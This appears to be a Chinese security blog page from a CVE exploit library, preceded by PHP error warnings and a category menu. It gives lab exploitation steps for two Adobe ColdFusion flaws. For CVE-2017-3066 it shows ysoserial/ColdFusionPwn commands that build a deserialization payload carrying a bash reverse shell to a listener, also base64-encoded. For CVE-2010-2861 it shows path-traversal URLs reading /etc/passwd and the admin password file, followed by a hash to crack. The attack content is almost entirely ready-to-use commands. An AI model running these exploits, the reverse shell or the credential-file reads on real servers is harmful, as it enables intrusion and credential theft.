Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined variable $addMisc in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 336

Warning: Undefined array key 68 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

Warning: Undefined array key 95 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

[—]CVE漏洞库
- [+]PHP漏洞
  - [+]zzcms漏洞
  - [+]zabbix漏洞
  - [+]xampp漏洞
  - [+]VictorCMS漏洞
  - [+]ThinkPHP漏洞
  - [+]taocms漏洞
  - [+]SubrionCMS漏洞
  - [+]SQL注入漏洞
  - [+]phpmyadmin漏洞
  - [+]php漏洞
  - [+]nagiosxi漏洞
  - [+]Metinfo漏洞
  - [+]Joomla漏洞
  - [+]Hooskcms漏洞
  - [+]finecms漏洞
  - [+]empire漏洞
  - [+]Drupal漏洞
  - [+]Discuz漏洞
  - [+]dedecms漏洞
  - [+]Made Simple漏洞
  - [+]AtomCMS漏洞
  - [+]鸳鸯漏洞
  - [+]文件上传漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [—]java漏洞
  - [+]XStream漏洞
  - [+]weblogic漏洞
  - [+]Tomcat漏洞
  - [+]struts2漏洞
  - [+]spring漏洞
  - [+]Solr漏洞
  - [+]Shiro漏洞
  - [+]OfBiz漏洞
  - [+]Nexus漏洞
  - [+]Log4j漏洞
  - [+]Kylin漏洞
  - [+]Jetty漏洞
  - [+]Jenkins漏洞
  - [+]jboss漏洞
  - [+]ElasticSearch漏洞
  - [+]druid漏洞
  - [—]ColdFusion漏洞
    
    (CVE-2023-26360)(CVE-2023-29300)
    
    (CVE-2017-3066)(CVE-2010-2861)
  - [+]ActiveMQ漏洞
  - [+]斑鸠漏洞
  - [+]反序列化漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [+]中间件漏洞
  - [+]webmin漏洞
  - [+]SaltStack漏洞
  - [+]Redis漏洞
  - [+]Rails漏洞
  - [+]python漏洞
  - [+]postgresql漏洞
  - [+]node漏洞
  - [+]nginx漏洞
  - [+]mysql漏洞
  - [+]jquery漏洞
  - [+]Imagemagick漏洞
  - [+]httpd漏洞
  - [+]GitLab漏洞
  - [+]GhostScript漏洞
  - [+]fastjson漏洞
  - [+]Django漏洞
  - [+]Couchdb漏洞
  - [+]Atlassian漏洞
  - [+]APISIX漏洞
  - [+]Airflow漏洞
  - [+]成对漏洞
  - [+]命令代码执行漏洞
  - [+]其他漏洞

31 5 月, 2024

(CVE-2017-3066)(CVE-2010-2861)

Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）

信息收集：nikto -h http://192.168.85.130:8500

生成一个文件并上传：java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ‘touch /tmp/success’ poc.ser

使用的反弹命令：/bin/bash -i >& /dev/tcp/192.168.85.128/2333 0>&1并进行base64编码：java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ‘bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguODUuMTI4LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}’ getshell.ser

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）

信息收集：nmap 192.168.85.130 -p 8500 -sV

直接访问：http://192.168.85.130:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

读取后台管理员密码：http://192.168.85.130:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

然后通过CMD5中的sha1加密算法破解：D033E22AE348AEB5660FC2140AEC35850C4DA997